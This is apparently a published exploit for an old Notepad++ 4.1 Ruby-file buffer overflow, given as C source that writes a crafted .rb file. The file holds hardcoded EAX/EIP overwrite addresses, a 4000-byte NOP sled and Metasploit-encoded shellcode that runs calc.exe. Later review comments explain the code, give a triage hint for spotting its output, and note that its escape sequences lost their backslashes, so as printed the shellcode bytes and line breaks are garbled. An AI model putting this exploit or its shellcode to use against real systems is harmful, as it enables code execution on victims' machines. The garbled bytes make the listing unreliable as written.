# Title : notepad++ 4.1 ruby file processing Buffer Overflow Exploit (win32)
# Published : 2007-05-12
# Author : vade79
/*[ notepad++[v4.1]: (win32) ruby file processing buffer overflow exploit. ]*
* *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* compile: *
* gcc xnotepad++.c -o xnotepad++ *
* *
* syntax: *
* ./xnotepad++ [-xe] -f filename *
* *
* notepad++ homepage/url: *
* http://sourceforge.net/projects/notepad-plus/ *
* http://notepad-plus.sourceforge.net/ *
* *
* notepad++ contains a buffer overflow vulnerability in the way it *
* processes ruby source files (.rb). this exploit works by overwriting *
* EAX which gets called during processing as "CALL DWORD EAX+4", so EAX *
* needs to point to a user-controlled area that contains another address *
* which will then become EIP. once EIP is controlled it simply jumps a *
* little bit forward in memory to the nop sled/shellcode. *
* *
* as of now, this will only be successful if the created file is opened *
* via "Edit with notepad++" on the file, not when opening a file from *
* inside notepad++. this is mainly to prove this vulnerability can be *
* exploited. *
* *
* exploitation method(file.rb): *
* [FILLERx32][NEW_EAX][FILLERx128]rn *
* # [NEW_EIPx1000][NOPSx4000][SHELLCODE]rn *
* *
* (i was a bit liberal with the new_eip/shellcode space, can pretty much *
* make it as large as you like. also, addresses with null-bytes are *
* allowed) *
* *
* if successful, notepad++ will spawn calc.exe by default, swap the *
* shellcode out if you want a different result. this was tested on winXP *
* SP2 ENG, if it is something else the EAX/EIP addresses may need to be *
* fished out of memory in your favorite debugger. *
***************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <getopt.h>
/* Defaults used when -x / -e are not given. Per the header they were taken
 * from winXP SP2 ENG and are not expected to hold on any other build. */
#define DFL_EAX 0x000fd47c /* winXP SP2 ENG */
#define DFL_EIP 0x000fe3d0 /* winXP SP2 ENG */
/* win32_exec - EXITFUNC=thread CMD=calc.exe Size=164 */
/* Encoder=PexFnstenvSub http://metasploit.com */
/* Payload that write_rb() appends after the NOP sled; the header says it
 * launches calc.exe as the proof-of-concept action.
 * NOTE(review): as printed on this page the literal spells each byte as an
 * ASCII triplet ("x31", no backslash), so it is 164 x 3 characters of text
 * and sizeof(x86_exec) is 493 here, not the 165 (164 + NUL) the Size
 * comment implies. write_rb() writes sizeof(x86_exec) bytes regardless. */
static unsigned char x86_exec[] =
"x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xd8"
"x19x25xc7x83xebxfcxe2xf4x24xf1x61xc7xd8x19xaex82"
"xe4x92x59xc2xa0x18xcax4cx97x01xaex98xf8x18xcex8e"
"x53x2dxaexc6x36x28xe5x5ex74x9dxe5xb3xdfxd8xefxca"
"xd9xdbxcex33xe3x4dx01xc3xadxfcxaex98xfcx18xcexa1"
"x53x15x6ex4cx87x05x24x2cx53x05xaexc6x33x90x79xe3"
"xdcxdax14x07xbcx92x65xf7x5dxd9x5dxcbx53x59x29x4c"
"xa8x05x88x4cxb0x11xcexcex53x99x95xc7xd8x19xaexaf"
"xe4x46x14x31xb8x4fxacx3fx5bxd9x5ex97xb0xf6xebx27"
"xb8x71xbdx39x52x17x72x38x3fx7ax44xabxbbx37x40xbf"
"xbdx19x25xc7";
/* Run-time configuration filled in by main() from the command line. The
 * object has static storage, so main() relies on `file` being NULL until
 * the first -f is parsed. */
struct{
unsigned int eax; /* -x value; write_rb() stores eax-4 in the first line */
unsigned int eip; /* -e value; write_rb() repeats it 1000 times in the comment line */
char *file; /* output path, heap-allocated by main(); freed only by process exit */
}tbl;
/* lonely extern. */
extern char *optarg; /* getopt()'s current option argument (also declared by <unistd.h>/<getopt.h>) */
/* functions. */
unsigned char write_rb(char *,unsigned int,unsigned int); /* returns 0 on success, 1 when fopen() fails */
void printe(char *,short); /* prints "[!] <msg>"; exits with status 1 when the second argument is non-zero */
void usage(char *); /* prints the syntax summary and exits with status 0 */
/* start. */
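/*
 * Entry point: parse options, echo the chosen addresses and hand off to
 * write_rb() to create the crafted .rb file.
 *
 * Options:
 *   -f <file>  output filename; ".rb" is appended unless the name already
 *              ends in ".rb" (case-insensitive). Only the first -f is
 *              honoured, later ones are silently ignored.
 *   -x <addr>  hex value stored in tbl.eax (default DFL_EAX).
 *   -e <addr>  hex value stored in tbl.eip (default DFL_EIP).
 * Any other option, or a missing -f, prints usage() and exits 0.
 *
 * Exit status: 0 on success. printe(..., 1) terminates with status 1 on
 * allocation failure, on an address that does not parse as hex, or when
 * write_rb() reports that the file could not be opened.
 *
 * Changes from the original: strrchr() replaces the legacy BSD rindex(),
 * snprintf() replaces sprintf() so the copy is bounded by the allocation,
 * and the sscanf() results are checked instead of leaving a typo'd address
 * silently at its default. The printf format strings are reproduced exactly
 * as they appear on this page; their "\n"/"\t" escapes look to have lost
 * their backslashes in extraction, so the banner prints without breaks.
 */
int main(int argc,char **argv){
    int chr = 0;
    char *dot = NULL;

    printf("[*] notepad++[v4.1]: (win32) ruby file processing buffer over"
    "flow exploit.n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
    "nn");
    tbl.eax = DFL_EAX;
    tbl.eip = DFL_EIP;

    /* getopt() returns -1 once the option list is exhausted. */
    while ((chr = getopt(argc, argv, "f:x:e:")) != -1) {
        switch (chr) {
        case 'f':
            /* first -f wins; keep the original's behaviour of ignoring repeats. */
            if (tbl.file) {
                break;
            }
            dot = strrchr(optarg, '.');
            if (dot && strcasecmp(dot, ".rb") == 0) {
                tbl.file = strdup(optarg);
                if (!tbl.file) {
                    printe("main(): allocating memory failed", 1);
                }
            } else {
                /* strlen + ".rb" + NUL */
                size_t len = strlen(optarg) + 4;
                tbl.file = malloc(len);
                if (!tbl.file) {
                    printe("main(): allocating memory failed", 1);
                }
                snprintf(tbl.file, len, "%s.rb", optarg);
            }
            break;
        case 'x':
            /* "%x" accepts an optional 0x prefix; anything unparsable is fatal. */
            if (sscanf(optarg, "%x", &tbl.eax) != 1) {
                printe("main(): invalid EAX address", 1);
            }
            break;
        case 'e':
            if (sscanf(optarg, "%x", &tbl.eip) != 1) {
                printe("main(): invalid EIP address", 1);
            }
            break;
        default:
            usage(argv[0]);
            break;
        }
    }

    if (!tbl.file) {
        usage(argv[0]);
    }
    printf("[*] filename:ttt%sn", tbl.file);
    printf("[*] EAX address:tt0x%.8xn", tbl.eax);
    printf("[*] EIP address:tt0x%.8xnn", tbl.eip);
    if (write_rb(tbl.file, tbl.eax, tbl.eip)) {
        printe("failed to write to file.", 1);
    }
    free(tbl.file);
    exit(0);
}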
/* write the ruby file. */
/*
 * write_rb - emit the crafted Ruby source file described in the header.
 *
 * file: path to create; opened "wb", so an existing file is truncated.
 * eax:  value main() took from -x. The value written is eax-4 because the
 *       header comment describes the crash site as "CALL DWORD EAX+4".
 * eip:  value main() took from -e; written 1000 times back to back.
 * Returns 0 on success, 1 if fopen() fails. The fwrite()/fclose() results
 * are not checked, so a short write or a failed flush is reported as success.
 *
 * Bytes written, in order (multi-byte values in host byte order, 4 bytes
 * each because unsigned int is assumed to be 32-bit):
 *   32 x 'x' | eax-4 | 128 x 'x' | "rn# " | 1000 x eip | 4000 x 0x90
 *   | x86_exec including its terminating NUL (sizeof) | "rn"
 * NOTE(review): the "rn" literals are printed here without backslashes; the
 * header's layout sketch suggests they were CRLF escapes in the original,
 * so as printed the function emits the ASCII letters r and n instead.
 * Triage hint: a .rb file whose second line is a '#' comment carrying a
 * long run of one repeated 4-byte value followed by thousands of 0x90
 * bytes matches this generator's output.
 */
unsigned char write_rb(char *file,unsigned int eax,unsigned int eip){
unsigned int i=0;
unsigned int real_eax=eax-4; /* so that EAX+4 lands on eax itself */
unsigned char filler='x';
unsigned char nop=0x90; /* x86 NOP */
FILE *fs;
if(!(fs=fopen(file, "wb")))return(1);
/* 32 bytes of padding before the overwritten value. */
for(i=0;i<32;i++){
fwrite(&filler,1,1,fs);
}
/* EAX overwrite, "CALL DWORD EAX+4" will be processed. */
fwrite(&real_eax,4,1,fs);
/* 128 more bytes of padding to the end of the first line. */
for(i=0;i<128;i++){
fwrite(&filler,1,1,fs);
}
/* from here on will be commented out, but loaded into memory. */
/* 4 bytes as printed: 'r', 'n', '#', ' ' (see NOTE above). */
fwrite("rn# ",4,1,fs);
/* EAX overwrite will point here, and change the EIP to this. */
for(i=0;i<1000;i++){
fwrite(&eip,4,1,fs);
}
/* EIP from above will point into this nop sled. */
for(i=0;i<4000;i++){
fwrite(&nop,1,1,fs);
}
/* if all went well, execute away! */
/* sizeof includes the array's trailing NUL, so one extra 0x00 follows the payload. */
fwrite(&x86_exec,sizeof(x86_exec),1,fs);
/* 2 bytes as printed: 'r', 'n'. */
fwrite("rn",2,1,fs);
fclose(fs); /* return value unchecked: a flush error is not reported */
return(0);
}
/* error! */
/* Report an error on stdout, prefixed "[!] ". When e is non-zero the process
 * terminates with status 1; otherwise control returns to the caller. The
 * format string is kept byte-for-byte as on this page (its trailing "n"
 * appears to be a "\n" whose backslash was lost in extraction). */
void printe(char *err,short e){
    fprintf(stdout, "[!] %sn", err);
    if (e != 0) {
        exit(1);
    }
}
/* usage. */
/* Print the command-line syntax and exit with status 0. The address shown
 * for each option is whatever tbl currently holds (the DFL_* defaults when
 * called before -x/-e were parsed). Format strings are reproduced exactly as
 * on this page; their "t"/"n" look like escapes that lost their backslash. */
void usage(char *progname){
    unsigned int shown_eax = tbl.eax;
    unsigned int shown_eip = tbl.eip;

    fprintf(stdout, "syntax: %s [-xe] -f filenamenn", progname);
    fputs(" -f <file>tfilename to output.n", stdout);
    fprintf(stdout,
            " -x <addr>tEAX address, points to new EIP address in memory (0x%.8x)n",
            shown_eax);
    fprintf(stdout,
            " -e <addr>tEIP address, points to NOPS/shellcode (0x%.8x)nn",
            shown_eip);
    exit(0);
}